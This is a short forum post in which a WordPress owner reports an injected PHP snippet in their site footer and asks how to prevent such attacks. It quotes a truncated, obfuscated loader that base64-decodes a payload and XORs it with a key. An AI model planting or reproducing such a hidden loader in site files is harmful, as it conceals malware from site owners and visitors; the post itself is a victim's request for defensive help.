wordpress php injection hack

My wordpress has been attack and the hacker inject php code into my footer.

Here is the code :

<?php /* 5pJQhrPh3XJCUOiaQCa6 */ ?><?php
$encoded = "ch0KCh...";
$raw = base64_decode($encoded);
$res = '';
for ($i = 0; $i < strlen($raw); $i++) {
    $res .= chr(ord($raw[$i]) ^ ord('x'));
<?php /* uqjsQSyWVhmOHAEVa1i6 */ ?>

I would like to know the solution to prevent these kind of injection ? My wordpress is the last version.


Read more here: wordpress php injection hack

Leave a Reply

Your email address will not be published. Required fields are marked *